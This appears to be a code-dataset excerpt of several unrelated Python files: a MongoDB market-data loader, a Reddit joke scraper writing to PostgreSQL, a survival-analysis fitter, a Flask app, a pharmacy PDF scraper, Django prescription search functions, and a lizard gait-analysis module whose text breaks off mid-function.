self.bar_collection_name = "bar_data"
self.tick_collection_name = "tick_data"
def load_bar_df(
self,
symbol: Union[str, List[str]],
exchange: Union[Exchange, List[Exchange]],
interval: Union[Interval, List[Interval]],
start: datetime = None,
end: datetime = None,
table: str = None,
) -> pd.DataFrame:
'''
symbol, exchange, interval = "128079", Exchange.SSE, Interval.MINUTE_5
symbol, exchange, interval = ["110038", "110043", "128079"], [Exchange.SSE, Exchange.SZSE], Interval.DAILY
symbol, exchange, interval = ["110038", "110043", "128079"], [Exchange.SSE, Exchange.SZSE], [Interval.DAILY, Interval.MINUTE_5]
df = dd.load_bar_df(symbol, exchange, interval)
'''
datetime_start = {"$gte": start} if start else {}
datetime_end = {"$lte": end} if end else {"$lte": datetime.now()}
db = self.client[self.database]
collection = db[table] if table is not None else db[self.bar_collection_name]
query = (
{
"symbol": symbol if isinstance(symbol, str) else {'$in': symbol},
"exchange": exchange.value if isinstance(exchange, Exchange) else {'$in': [e.value for e in exchange]},
"interval": interval.value if isinstance(interval, Interval) else {'$in': [i.value for i in interval]},
"datetime": {**datetime_start, **datetime_end}
},
{'_id': 0}
)
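        # query is a (filter, projection) pair; *query unpacks it into
        # collection.find(filter, projection), with _id excluded so the result
        # flattens cleanly into a DataFrame.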
return pd.json_normalize(list(collection.find(*query)))
def save_bar_df(self, df, table: str = None, callback=None):
'''
df的datetime如果没有tzinfo, 为了统一, 最好设置一下,
例如: df['datetime'] = df['datetime'].tz_localize(DB_TZ)
:param df:
:param table: 可以指定新的表名, 进行分表存储, 替代默认的 "bar_data"
:param callback: 用于回显当前存储进度
:return:
'''
if len(df) == 0:
return
        # sort by datetime ascending, i.e. oldest rows first
df.sort_values(by=['datetime'], inplace=True)
db = self.client[self.database]
collection = db[self.bar_collection_name] if table is None else db[table]
my_list = df.to_dict('records')
        # the for loop below exists mainly so the callback can report progress
n_rows = len(my_list)
        chunk_size = max(1, round(n_rows / 10))  # split into roughly 10 chunks for now (guard against 0)
for i in range(int(n_rows / chunk_size) + 1):
start_i = i * chunk_size
end_i = min((i + 1) * chunk_size, n_rows)
if start_i >= end_i:
break
collection.insert_many(my_list[start_i:end_i])
if callback is not None:
callback(n_rows, start_i)
symbol = my_list[0]["symbol"]
exchange = my_list[0]["exchange"]
interval = my_list[0]["interval"]
        # update the overview record
overview_filter = {
"symbol": symbol,
"exchange": exchange,
"interval": interval
}
overview = self.overview_collection.find_one(overview_filter)
start_datetime = my_list[0]["datetime"].to_pydatetime()
end_datetime = my_list[-1]["datetime"].to_pydatetime()
if not overview:
overview = {
"symbol": symbol,
"exchange": exchange,
"interval": interval,
"count": len(my_list),
"start": start_datetime,
"end": end_datetime
}
else:
overview["start"] = min(start_datetime, overview["start"])
overview["end"] = max(end_datetime, overview["end"])
            # TODO: when tables are sharded later, revisit how this count is updated
overview["count"] = self.bar_collection.count_documents(overview_filter)
self.overview_collection.update_one(overview_filter, {"$set": overview}, upsert=True)
return True
def get_groupby_df(self, table: str = None) -> pd.DataFrame:
db = self.client[self.database]
collection = db[self.bar_collection_name] if table is None else db[table]
query = [
{
"$group": {
"_id": {"exchange": "$exchange", "interval": "$interval", "symbol": "$symbol"},
"count": {"$sum": 1}
}
}
]
return pd.json_normalize(
list(collection.aggregate(query))
).rename(
columns={
"_id.exchange": "exchange",
"_id.interval": "interval",
"_id.symbol": "symbol",
"count": "count(1)",
}
)
def get_end_date(self, symbol: str, exchange: Exchange, interval: Interval) -> np.datetime64:
# sql = f'''select * from dbbardata
# where symbol='{symbol}' and exchange='{exchange}' and interval='{interval}'
# order by datetime desc limit 1;
# '''
df = self.get_sorted_date_df(symbol, exchange, interval, ascend=False)
return df['datetime'].values[0]
def get_start_date(self, symbol: str, exchange: Exchange, interval: Interval) -> np.datetime64:
# sql = f'''select * from dbbardata
# where symbol='{symbol}' and exchange='{exchange}' and interval='{interval}'
# order by datetime asc limit 1;
# '''
df = self.get_sorted_date_df(symbol, exchange, interval, ascend=True)
return df['datetime'].values[0]
def get_sorted_date_df(self, symbol: str, exchange: Exchange, interval: Interval, ascend=True,
table: str = None) -> pd.DataFrame:
ascend = 1 if ascend else -1
db = self.client[self.database]
collection = db[self.bar_collection_name] if table is None else db[table]
query = (
{"symbol": symbol, "exchange": exchange.value, "interval": interval.value},
{'_id': 0}
)
return pd.json_normalize(
list(
collection.find(*query).sort([("datetime", ascend)]).limit(1)
)
)
if __name__ == '__main__':
symbol, exchange, interval = "RBL8", Exchange.SHFE, Interval.MINUTE_5
dd = JoMongodbDatabase()
# start_date = dd.get_start_date(symbol, exchange, interval)
# end_date = dd.get_end_date(symbol, exchange, interval)
# grb_df = dd.get_groupby_df()
symbol, exchange, interval = "128079", Exchange.SSE, Interval.MINUTE_5
symbol, exchange, interval = ["110038", "110043", "128079"], [Exchange.SSE, Exchange.SZSE], Interval.DAILY
symbol, exchange, interval = ["110038", "110043", "128079"], [Exchange.SSE, Exchange.SZSE], [Interval.DAILY,
Interval.MINUTE_5]
df = dd.load_bar_df(symbol, exchange, interval)
# dd.save_bar_df(df)
print(1)
``` |
{
"source": "jojordan3/dad-joke-ai",
"score": 3
} |
#### File: jojordan3/dad-joke-ai/pipeline.py
```python
import pandas as pd
import re
import psycopg2
import sys
from subreddits.pushshift import *
from datetime import datetime as dt
from datetime import timedelta as td
from datetime import timezone as tz
joke_file_base = 'data_%%%%.csv'
record_file_base = 'data_%%%%.txt'
base_URL = 'https://api.pushshift.io/reddit/submission/search/?q=&size=1000&\
subreddit=%%%%&'
score_cats = [1, 5, 20, 100]
comment_cats = [1, 3, 10, 50]
newlines = re.compile(r'(\\n)+')
def _gettext(s):
s = s.replace('&#x200B;', '')
s = s.replace('&', 'and')
s = newlines.sub(' ', s)
return s
def prepare_text(data):
data.title.fillna('', inplace=True)
data.selftext.fillna('', inplace=True)
data['title_clean'] = data.title.apply(_gettext)
data['selftext_clean'] = data.selftext.apply(_gettext)
data['score_cat'] = data.score.apply(lambda _: _categorize(_, score_cats))
data['comment_cat'] = data.comments.apply(
lambda _: _categorize(_, comment_cats))
data['createdUTC'] = data.createdUTC.apply(
lambda x: dt.fromtimestamp(x, tz.utc))
return data
def _categorize(val, cutoffs):
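    # Map a value onto an ordinal bucket, e.g. with cutoffs [1, 5, 20, 100]:
    # 0 -> 0, 3 -> 1, 250 -> 4 (one past the last cutoff).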
for level, upper_bound in enumerate(cutoffs):
if val < upper_bound:
return level
return len(cutoffs)
def _create_table(cur, sr):
cur.execute(f"""CREATE TABLE {sr} (
postid varchar(8) PRIMARY KEY,
created timestamptz,
prev_created varchar(20),
author varchar(40),
title text,
selftext text,
score int,
comments int,
scorecat smallint,
commentcat smallint);""")
def _add_rows(conn, sr, ordered_vals):
with conn.cursor() as cur:
data_str = b','.join([cur.mogrify(
"(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",
v) for v in ordered_vals]).decode()
cur.execute(f"""INSERT INTO {sr}
(postid, created, prev_created, author, title, selftext, score,
comments, scorecat, commentcat) VALUES """ + data_str + ';')
conn.commit()
def _update_rows(conn, sr, ordered_vals):
with conn.cursor() as cur:
cur.execute("""CREATE TEMP TABLE tempvals(
postid varchar(8),
score int,
comments int,
scorecat smallint,
commentcat smallint);""")
data_str = b','.join(cur.mogrify(
"(%s, %s, %s, %s, %s)", v) for v in ordered_vals).decode()
cur.execute(f"""INSERT INTO tempvals (
postid, score, comments, scorecat, commentcat)
VALUES """ + data_str +';')
cur.execute(f"""UPDATE {sr} j
SET (score, comments, scorecat, commentcat) =
(SELECT score, comments, scorecat, commentcat
FROM tempvals t WHERE t.postid = j.postid);""")
conn.commit()
def read_or_create_table(sr):
with psycopg2.connect('dbname=postgres user=postgres') as conn:
with conn.cursor() as cur:
try:
cur.execute(f"SELECT MAX(created) FROM {sr};")
except psycopg2.Error:
conn.rollback()
_create_table(cur, sr)
conn.commit()
last_post_time = None
else:
last_post_time = cur.fetchone()[0]
conn.close()
return last_post_time
def update_db(sr, start=None):
try:
ago = (start - td(days=100))
UTC = int(ago.replace(tzinfo=tz.utc).timestamp())
except:
UTC = int(1319397000)
num_subs = 1000
while num_subs == 1000:
data = get_list(base_URL, 'after', UTC, sr)
UTC, parsed, num_subs = parse_joke(data, 'sql', sr)
df = pd.DataFrame(data=parsed, index=None, columns=[
'id', 'createdUTC', 'parent_createdUTC', 'author',
'title', 'selftext', 'score', 'comments'
])
df = prepare_text(df)
with psycopg2.connect("dbname=postgres user=postgres") as conn:
with conn.cursor() as cur:
q = cur.mogrify(f"""SELECT postid, score, comments, scorecat,
commentcat FROM {sr} WHERE postid IN %s;""",
(tuple(df.id.values),))
cur.execute(q)
to_update = []
try:
overlap = cur.fetchall()
except:
pass
else:
repeat_rows = df.id.isin([i[0] for i in overlap])
sec = [tuple(x) for x in df[repeat_rows][[
'id', 'score', 'comments', 'score_cat', 'comment_cat']].values]
if len(sec) > 0:
to_update = []
for i, row in enumerate(sec):
                            if tuple(overlap[i]) != row:
to_update.append(row)
if len(to_update) > 0:
_update_rows(conn, sr, to_update)
df = df.drop(index=df[repeat_rows].index)
finally:
ordered_vals = df.apply(lambda row: tuple(
row[['id', 'createdUTC', 'parent_createdUTC', 'author',
'title_clean', 'selftext_clean', 'score', 'comments',
'score_cat', 'comment_cat']]), axis=1)
if len(df) > 0:
_add_rows(conn, sr, ordered_vals)
conn.commit()
conn.close()
last_datetime = dt.fromtimestamp(UTC, tz.utc)
time_str = last_datetime.strftime('%Y-%m-%d %H:%M:%S')
print(f'Updated {len(to_update)}, Added {len(df)}, End {time_str} (UTC: {str(UTC)})')
if __name__ == "__main__":
try:
subreddit = sys.argv[1]
except:
        while True:
            subreddit = input('Which subreddit would you like to search? ')
            if subreddit:
                break
finally:
time_s = read_or_create_table(subreddit)
update_db(subreddit, start=time_s)
``` |
{
"source": "jojordan3/lifelines",
"score": 3
} |
#### File: lifelines/fitters/breslow_fleming_harrington_fitter.py
```python
from __future__ import print_function
import numpy as np
from lifelines.fitters import UnivariateFitter
from lifelines import NelsonAalenFitter
from lifelines.utils import median_survival_times
class BreslowFlemingHarringtonFitter(UnivariateFitter):
"""
Class for fitting the Breslow-Fleming-Harrington estimate for the survival function. This estimator
    is a biased estimator of the survival function, but is more stable when the population is small and
    there are too few early truncation times: it may happen that the number of patients at risk and
    the number of deaths are the same.
Mathematically, the NAF estimator is the negative logarithm of the BFH estimator.
BreslowFlemingHarringtonFitter(alpha=0.95)
Parameters
----------
alpha: float
The alpha value associated with the confidence intervals.
"""
def fit(
self,
durations,
event_observed=None,
timeline=None,
entry=None,
label="BFH_estimate",
alpha=None,
ci_labels=None,
): # pylint: disable=too-many-arguments
"""
Parameters
----------
duration: an array, or pd.Series, of length n
duration subject was observed for
timeline:
            return the best estimate at the values in timelines (positively increasing)
event_observed: an array, or pd.Series, of length n
            True if the death was observed, False if the event was lost (right-censored). Defaults all True if event_observed==None
entry: an array, or pd.Series, of length n
relative time when a subject entered the study. This is
useful for left-truncated observations, i.e the birth event was not observed.
If None, defaults to all 0 (all birth events observed.)
label: string
a string to name the column of the estimate.
alpha: float
the alpha value in the confidence intervals. Overrides the initializing
alpha for this call to fit only.
ci_labels: iterable
add custom column names to the generated confidence intervals
as a length-2 list: [<lower-bound name>, <upper-bound name>]. Default: <label>_lower_<alpha>
Returns
-------
self, with new properties like 'survival_function_'.
"""
self._label = label
alpha = alpha if alpha is not None else self.alpha
naf = NelsonAalenFitter(alpha)
naf.fit(
durations, event_observed=event_observed, timeline=timeline, label=label, entry=entry, ci_labels=ci_labels
)
self.durations, self.event_observed, self.timeline, self.entry, self.event_table = (
naf.durations,
naf.event_observed,
naf.timeline,
naf.entry,
naf.event_table,
)
# estimation
self.survival_function_ = np.exp(-naf.cumulative_hazard_)
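        # BFH survival estimate: S(t) = exp(-H(t)), where H(t) is the
        # Nelson-Aalen cumulative hazard fitted above.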
self.confidence_interval_ = np.exp(-naf.confidence_interval_)
self.median_ = median_survival_times(self.survival_function_)
# estimation methods
self._estimation_method = "survival_function_"
self._estimate_name = "survival_function_"
self._predict_label = label
self._update_docstrings()
# plotting functions
self.plot_survival_function = self.plot
return self
``` |
{
"source": "jojordan3/LSDS-Flask-MiniApp",
"score": 3
} |
#### File: LSDS-Flask-MiniApp/flask_miniapp/app.py
```python
from flask import Flask, render_template, request
from .models import DB, User, Tweet
from decouple import config
def create_app():
'''Create and configure an instance of the Flask application
'''
app = Flask(__name__)
    app.config['SQLALCHEMY_DATABASE_URI'] = config('DATABASE_URL')
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['ENV'] = config('ENV')
DB.init_app(app)
@app.route('/')
def root():
# auto searches templates folder
users = User.query.all()
return render_template('base.html', title='Home', users=users)
@app.route('/reset')
def reset():
DB.drop_all()
DB.create_all()
        return render_template('base.html', title='Database Reset', users=[])
return app
``` |
{
"source": "jojordan3/prescription-search-django",
"score": 3
} |
#### File: supplementary_data/scraping_pharms/from_bcbs_pdf.py
```python
from tabula import read_pdf
import sys
import os
import pandas as pd
# Includes Washington DC, Puerto Rico, and Virgin Islands
# Orig taken from
# https://gist.github.com/bubblerun/a624de5b4fa8ff0980010054a7220977
states = ['AL', 'AK', 'AZ', 'AR', 'CA', 'CO', 'CT', 'DE', 'DC', 'FL', 'GA',
'HI', 'ID', 'IL', 'IN', 'IA', 'KS', 'KY', 'LA', 'ME', 'MD', 'MA',
'MI', 'MN', 'MS', 'MO', 'MT', 'NE', 'NV', 'NH', 'NJ', 'NM', 'NY',
'NC', 'ND', 'OH', 'OK', 'OR', 'PA', 'PR', 'RI', 'SC', 'SD', 'TN',
'TX', 'UT', 'VT', 'VI', 'VA', 'WA', 'WV', 'WI', 'WY']
obj_length = len(states) # For progress bar
# Link to PDF files - state abbreviation replaces @@
l = f'https://www.bcbsri.com/BCBSRIWeb/pdf/state_pharmacies/@@_PHARMACIES.pdf'
dir_path = os.path.dirname(os.path.abspath(__file__)) # Directory path to save
# For pandas df
option = {'names': ['PharmacyNumber', 'PharmacyNPI', 'PharmacyName',
'PharmacyStreetAddress1', 'PharmacyCity', 'PharmacyState',
'PharmacyZip', 'other1', 'other2'],
'header': None, 'dtype': str, 'index_col': False}
def progressbar(i, current):
'''Simple progress bar'''
width = 55
if i == 0:
sys.stdout.write(f"Progress: [>{' ' * (width - 1)}] 0.0%")
sys.stdout.flush()
sys.stdout.write('\b' * 4)
else:
progress = int(width * i / obj_length)
percent = i * 100 / obj_length
if progress > current:
sys.stdout.write('\r')
sys.stdout.write(f"Progress: \
[{'=' * progress}>{' ' * (width - progress - 1)}] {percent:.1f}%")
sys.stdout.flush()
else:
sys.stdout.write(f'{percent:.1f}%')
sys.stdout.flush()
sys.stdout.write('\b' * len(f'{percent:.1f}%'))
i += 1
progress = current
return i, progress
def get_bcbs_info(save_to_path):
'''Get data from all states covered by BlueCross BlueShield'''
pharmacies = []
i = 0
progress = 0
obj_length = len(states)
for state in states:
i, progress = progressbar(i, progress)
df = read_pdf(l.replace('@@', state), pandas_options=option)
df = df.drop(columns=['other1', 'other2'])
pharmacies.append(df)
bcbs_pharms = pd.concat(pharmacies, ignore_index=True)
bcbs_pharms.to_csv(save_to_path)
print('File saved to: ' + save_to_path)
if __name__ == "__main__":
get_bcbs_info(dir_path + '/bcbspharms.csv')
```
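The scraper builds one PDF URL per state by substituting the `@@` placeholder in the template defined above. A minimal sketch of just that substitution step (independent of tabula; the template string is the one from the script, the state list is shortened for illustration):

```python
# Sketch: expand the BCBS URL template for a few state abbreviations.
template = 'https://www.bcbsri.com/BCBSRIWeb/pdf/state_pharmacies/@@_PHARMACIES.pdf'
for state in ['AL', 'AK', 'AZ']:  # shortened list, for illustration only
    print(template.replace('@@', state))
```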
#### File: local_deploy/rx_info/search_functions.py
```python
from .models import RxClaim, PharmacyInfo, BrandToGeneric, ZipCodeInfo
import pandas as pd
from django_pandas.io import read_frame
from geopy.distance import distance as gdist
import psycopg2
def search_by_pharm(drug, zipcode):
drug = generic(drug)
try:
qs = RxClaim.objects.filter(pharmacyid__PharmacyZip__in=[zipcode,
'XXXXX'],
DrugLabelName__contains=drug)
df = qs.to_pivot_table(rows=['PharmacyID'], values='UnitCost',
aggfunc='mean')
return df.sort_values(by='UnitCost')
except RxClaim.DoesNotExist:
try:
zipcodes = get_nearby(zipcode)
qs = RxClaim.objects.filter(pharmacyid__PharmacyZip__in=zipcodes,
DrugLabelName__contains=drug)
df = qs.to_pivot_table(rows=['PharmacyID'], values='UnitCost',
aggfunc='mean')
return df.sort_values(by='UnitCost')[:5]
except:
raise
def get_pharm_info(pharmID):
return read_frame(PharmacyInfo.objects.filter(pk__in=[pharmID]),
index_col='PharmacyID')
def search_by_pbm(drug):
drug = generic(drug)
try:
qs = RxClaim.objects.filter(DrugLabelName__contains=drug)
df = qs.to_pivot_table(rows=['PBMVendor'],
values='UnitCost', aggfunc='mean')
return df.sort_values(by='UnitCost')[:5]
except RxClaim.DoesNotExist:
raise
def generic(drug):
# look the drug up by brand name first, then fall back to the generic name
try:
med = BrandToGeneric.objects.get(Brand__contains=drug)
except BrandToGeneric.DoesNotExist:
med = BrandToGeneric.objects.get(Generic__contains=drug)
return med.Generic
def get_nearby(zipcode):
try:
zc = ZipCodeInfo.objects.get(pk=zipcode)
lat_ = zc.latitude
long_ = zc.longitude
qs = ZipCodeInfo.objects.filter(latitude__range=((lat_ - 0.03),
(lat_ + 0.03)),
longitude__range=((long_ - 0.03),
(long_ + 0.03)))
zipcodes = qs.values_list('zipcode', flat=True)
return zipcodes
except ZipCodeInfo.DoesNotExist:
raise
``` |
{
"source": "JojoReikun/ClimbingLizardDLCAnalysis",
"score": 2
} |
#### File: lizardanalysis/calculations/aep_pep_2.py
```python
def footfall_by_switches(**kwargs):
# TODO: make the low-pass filter optional; if it is not used, smooth the footfall data directly
import os.path
import pandas as pd
from pathlib import Path
from lizardanalysis.utils import animal_settings
# define necessary **kwargs:
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
config = kwargs.get('config')
filename = kwargs.get('filename')
likelihood = kwargs.get('likelihood')
animal = kwargs.get('animal')
config_file = Path(config).resolve()
# result folder for footfall plots
step_detection_folder = os.path.join(str(config_file).rsplit(os.path.sep, 1)[0], "analysis-results",
"step_detection")
# create file path for foot fall pattern diagrams
plotting_footfall_folder = os.path.join(step_detection_folder, "footfall-pattern-diagrams")
# TODO: instead of hard-coding the feet and the three points for body_motion,
# TODO: let the user choose based on labels available in DLC result file: Choose feet & choose body motion
scorer = data.columns[1][0]
feet = animal_settings.get_list_of_feet(animal)
relative = False
plotting_footfall_patterns = True
# define cut-off value -> crops X% of frames on each side of video:
p_cut_off = 0.05
# read in all the frames for hip, spine and shoulder (x) to get mean body motion
body_motion = {"frame": [], "mean_motion_x": []}
head_diff = 0
ab_diff = 0
for row in range(1, data_rows_count):
# go through frames and extract the x-diff for body-axis labels; take the mean and store in dict
# filter for likelihood, add new shoulder_diff if likelihood is good, else use last value:
if data.loc[row][scorer, "head", 'likelihood'] >= likelihood and data.loc[row - 1][
scorer, "head", 'likelihood'] >= 0:
head_diff = data.loc[row][scorer, "head", 'x'] - data.loc[row - 1][scorer, "head", 'x']
if data.loc[row][scorer, "abdomen", 'likelihood'] >= likelihood and data.loc[row - 1][
scorer, "abdomen", 'likelihood'] >= likelihood:
ab_diff = data.loc[row][scorer, "abdomen", 'x'] - data.loc[row - 1][scorer, "abdomen", 'x']
body_motion['frame'].append(row - 1)
body_motion['mean_motion_x'].append((head_diff + ab_diff) / 2.0)
# one class instance and one result array for every foot, because every foot needs own counter
calculators = {}
results = {}
# for every foot:
foot_motions = {}
rel_foot_motions = {}
for foot in feet:
foot_motions[f"{foot}"] = []
rel_foot_motions[f"rel_{foot}"] = []
# read in all frames (x) differences: if moving forward = pos, if moving backwards = neg
foot_motion = 0
for row in range(1, data_rows_count):
# if likelihood is worse than set value, last foot_motion will be used
if data.loc[row][scorer, f"{foot}", 'likelihood'] >= likelihood and data.loc[row - 1][
scorer, f"{foot}", 'x'] >= likelihood:
foot_motion = data.loc[row][scorer, f"{foot}", 'x'] - data.loc[row - 1][scorer, f"{foot}", 'x']
# foot motion
foot_motions[f"{foot}"].append(foot_motion)
# foot motion - body motion
rel_foot_motions[f"rel_{foot}"].append(foot_motion - body_motion['mean_motion_x'][row - 1])
# print('foot_motions: ', foot_motions)
# create dataframe with >> frame | body_motion | rel_foot_motion << for current foot
dict_df = {'body_motion': body_motion['mean_motion_x'],
'foot_motion': foot_motions[f"{foot}"],
'rel_foot_motion': rel_foot_motions[f"rel_{foot}"]}
df = pd.DataFrame.from_dict(dict_df)
# print("df: ", df)
# gets a dict with x-values and the sign for switch in swing and stance phases (after smoothing data)
# change in sign: positive to body = swing, negative to body = stance
intersections = smooth_and_plot(df, data_rows_count, p_cut_off, relative, foot, filename, step_detection_folder)
# print(f"intersections for foot {foot}: ", intersections)
# initializes class instance for every foot and empty result dict to be filled with the swing and stance phases:
calculators[foot] = StridesAndStances()
# "S10" = string of 10 characters: stance/stride + counter 000n
results[foot] = calculators[foot].determine_stride_phases(intersections, data_rows_count)
# rename dictionary keys of results
results = {'stepphase_' + key: value for (key, value) in results.items()}
# print("results: ", results)
if plotting_footfall_patterns:
""" plots a foot fall pattern diagram for every DLC result csv file/every lizard run """
plot_footfall_pattern(results, data_rows_count, filename, plotting_footfall_folder)
return results
def smooth_and_plot(df, data_rows_count, p_cut_off, relative, foot, filename, step_detection_folder, plotting=True):
"""
Smooths the raw input data from foot motion and body motion, using a Butterworth low-pass filter and a
Savitzky-Golay smoothing algorithm. Then computes the intersection points between the smoothed body and foot curves.
If relative is True, body motion is already subtracted from the foot motion, hence foot is relative to the x-axis.
If relative is False, intersection between foot motion and body motion is determined.
If plotting is True: plots the footfall and body motion curves, and the intersection points between the
smoothed curve and the x-axis (switch betw. swing and stance phase)
return: dictionary which contains a list with x-values (frames) of intersection points and corresponding signs +1 or -1
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal
import os
import errno
# determine p_cutoff position:
x_cutoff_value = int(round(data_rows_count * p_cut_off, 0))
# add low pass filter to cut off spikes in data:
# Butterworth filter
x = np.linspace(0, data_rows_count - 1, data_rows_count - 1)
b, a = signal.butter(3, 0.1, btype='lowpass', analog=False)
x_cutoff = np.linspace(x_cutoff_value, data_rows_count - 1, int(data_rows_count - 1 - x_cutoff_value))
if plotting == True:
# initiate plot
plt.figure()
plt.axvline(x_cutoff_value, color='black', label='cutoff 0.05%')
if relative == True:
"""
Uses the foot motion from which body motion has been subtracted, hence body motion is the x-axis.
Note: intersection points for the lizard standing won't be excluded with this method. Use relative==False.
"""
# lowpass filter for foot motion
rel_foot_motion_low_passed = signal.filtfilt(b, a, df['rel_foot_motion'])
# smooth curves:
# Savitzky-Golay filter
y_foot_rel = df.loc[x_cutoff_value:, 'rel_foot_motion']
y_foot_rel_lp = rel_foot_motion_low_passed[x_cutoff_value:]
# smooth original foot motion without low pass filter
y_foot_rel_smoothed = signal.savgol_filter(y_foot_rel, 17, 3)
# smooth low-pass-filtered rel foot motion
y_foot_rel_lp_smoothed = signal.savgol_filter(y_foot_rel_lp, 17, 3)
# compute and plot intersection points:
x_axis_f = np.zeros(data_rows_count - 1 - x_cutoff_value)
idx = np.argwhere(np.diff(np.sign(x_axis_f - y_foot_rel_lp_smoothed))).flatten()
intersections_dict = {"idx": [], "sign": []}
for i in idx:
intersections_dict["idx"].append(i)
intersections_dict["sign"].append(np.sign(x_axis_f[i] - y_foot_rel_lp_smoothed[i]))
intersections_dict['idx'] = [b + x_cutoff_value for b in intersections_dict['idx']]
# print("x intersections: ", intersections_dict)
# remove intersection points when lizard has stopped walking:
# intersections_dict = remove_standing_intersections(intersections_dict, x_axis_f, y_foot_rel_lp_smoothed)
if plotting == True:
df['rel_foot_motion'].plot(color='#f5c242') # plot rel_foot
plt.plot(x, rel_foot_motion_low_passed, color='green', label='rel_foot_motion low pass (lp) filter')
plt.plot(x_cutoff, y_foot_rel_smoothed, color='red', label='rel_foot_motion_smoothed')
plt.plot(x_cutoff, y_foot_rel_lp_smoothed, color='lightgreen', label='rel_foot_motion_lp_smoothed')
plt.plot(x_cutoff[idx], x_axis_f[idx], 'ko') # plot intersection points
for i in range(len(intersections_dict['idx'])):
plt.annotate(intersections_dict['idx'][i],
(x_cutoff[intersections_dict['idx'][i] - x_cutoff_value] - 5,
x_axis_f[intersections_dict['idx'][i] - x_cutoff_value] + 3))
else:
"""
Uses the foot motion and the body motion and computes the intersection points for the smoothed curves.
Intersection points for the lizard standing (bodymotion -> 0) will get excluded by using a body-motion threshold
of 10% of max(body_motion_lp_smoothed).
"""
# lowpass filter for body motion
body_motion_low_passed = signal.filtfilt(b, a, df['body_motion'])
# lowpass filter for foot motion
foot_motion_low_passed = signal.filtfilt(b, a, df['foot_motion'])
# smooth curves:
y_body = df.loc[x_cutoff_value:, 'body_motion']
y_body_lp = body_motion_low_passed[x_cutoff_value:]
y_foot = df.loc[x_cutoff_value:, 'foot_motion']
y_foot_lp = foot_motion_low_passed[x_cutoff_value:]
# smooth original body motion without low pass filter
y_body_smoothed = signal.savgol_filter(y_body, 51, 3)
# smooth low-pass-filtered body motion
y_body_lp_smoothed = signal.savgol_filter(y_body_lp, 17, 3)
# smooth original foot motion without low pass filter
y_foot_smoothed = signal.savgol_filter(y_foot, 17, 3)
# smooth low-pass-filtered rel foot motion
y_foot_lp_smoothed = signal.savgol_filter(y_foot_lp, 17, 3)
# compute and plot intersection points:
idx = np.argwhere(np.diff(np.sign(y_body_lp_smoothed - y_foot_lp_smoothed))).flatten()
intersections_dict = {"idx": [], "sign": []}
max_body_motion = max([abs(max(y_body_lp_smoothed)), abs(min(y_body_lp_smoothed))])
body_motion_stand = round(max_body_motion * 0.1, 2)
# print(f"max body motion: {max_body_motion}, 10%: {body_motion_stand}")
for i in idx:
# exclude all intersections which are within 0 +- 10% of max body motion (~standing)
if abs(y_body_lp_smoothed[i]) >= body_motion_stand:
intersections_dict["idx"].append(i)
intersections_dict["sign"].append(np.sign(y_body_lp_smoothed[i] - y_foot_lp_smoothed[i]))
intersections_dict['idx'] = [b + x_cutoff_value for b in intersections_dict['idx']]
# print("x intersections: ", intersections_dict)
# remove intersection points when lizard has stopped walking (usually in the end):
# intersections_dict = remove_standing_intersections(intersections_dict, y_body_lp_smoothed, y_foot_lp_smoothed)
if plotting == True:
df['body_motion'].plot(color='#3089db') # plot body motion
df['foot_motion'].plot(color='#d68f00') # plot foot motion
plt.plot(x, body_motion_low_passed, color='lightblue', label='body_motion low pass (lp) filter')
plt.plot(x, foot_motion_low_passed, color='green', label='foot_motion low pass (lp) filter')
plt.plot(x_cutoff, y_body_smoothed, color='#160578', label='body_motion_smoothed')
plt.plot(x_cutoff, y_foot_smoothed, color='red', label='foot_motion_smoothed')
plt.plot(x_cutoff, y_body_lp_smoothed, color='#9934b3', label='body_motion_lp_smoothed')
plt.plot(x_cutoff, y_foot_lp_smoothed, color='lightgreen', label='foot_motion_lp_smoothed')
plt.plot(x_cutoff[idx], y_body_lp_smoothed[idx], 'ko') # plot intersection points
for i in range(len(intersections_dict['idx'])):
plt.annotate(intersections_dict['idx'][i],
(x_cutoff[intersections_dict['idx'][i] - x_cutoff_value] - 5,
y_body_lp_smoothed[intersections_dict['idx'][i] - x_cutoff_value] + 3))
if plotting == True:
# set y-limits, add legend and display plots
plt.axhline(0, color='black')
plt.ylim(-30, 30)
plt.legend()
plt.xlabel('frames')
plt.ylabel('dx/frame')
filename_title = filename.split("_", 2)[:2]
filename_title = filename_title[0] + filename_title[1]
plt.title(f"{filename_title}-{foot}")
# plt.show()
try:
os.makedirs(step_detection_folder)
# print("folder for curve_fitting plots created")
except OSError as e:
if e.errno != errno.EEXIST:
raise
if relative == True:
plt.savefig(os.path.join(step_detection_folder, f"steps_{filename_title}_{foot}_rel.pdf"))
else:
plt.savefig(os.path.join(step_detection_folder, f"steps_{filename_title}_{foot}.pdf"))
# plt.show()
plt.close()
return intersections_dict
def remove_standing_intersections(intersection_dict, foot_function, body_function):
"""
NOT USED ATM
"""
from scipy.integrate import quad
# TODO: find functions for foot and body curves
# use area underneath curve between intersection points.
# If area smaller than 5% of the area before, remove index after that
idxs = intersection_dict['idx']
signs = intersection_dict['sign']
areas = []
for i in range(1, len(idxs) - 1):
# set integral limits
a = idxs[i - 1]
b = idxs[i]
if signs[i] > 0: # if sign is positive, foot curve will be greater than body curve, hence integral(foot-body)
f = foot_function
g = body_function
else: # if sign is negative, body curve will be greater, hence integral(body-foot)
f = body_function
g = foot_function
# calculate the area between the two curves: Intergal((f(x)-g(x))dx)
area = quad((f - g), a, b)
areas.append(area)
# check subsequent area sizes to discard idx:
return intersection_dict
class StridesAndStances:
"""
class to detect stride and stance phases for current feet => initialize class instance for every foot.
This method iterates through all frames, if the current frame is one of the intersection points, the sign of the
point will be checked. If the sign is positive the phase will be set to swing and the swing_phase_counter increased
by 1. All frames until the next intersection will be assigned that phase name and number.
Rows before and after first and last index respectively will be filled with np.nan.
"""
def __init__(self):
import numpy as np
self.stride_phase_counter = 0
self.stance_phase_counter = 0
self.phase = 'UNKNOWN'
self.current_phase = np.nan
def determine_stride_phases(self, intersection_dict, data_rows_count):
"""
Function to detect the swing or stance phases using the intersection points and their signs.
Return: list with one entry for every row.
"""
import numpy as np
# create empty list with length of data rows count:
results = np.full((data_rows_count,), '', dtype='S10')
index = 0
for row in range(data_rows_count):
# switch swing or stance depending on sign of intersection point
if row in intersection_dict['idx']:
index = intersection_dict['idx'].index(row) # find the index in list of current idx
sign = intersection_dict['sign'][index] # find the respective sign
# if sign is positive, the phase till next idx will be swing
self.current_phase = self.assign_swing_or_stance(sign)
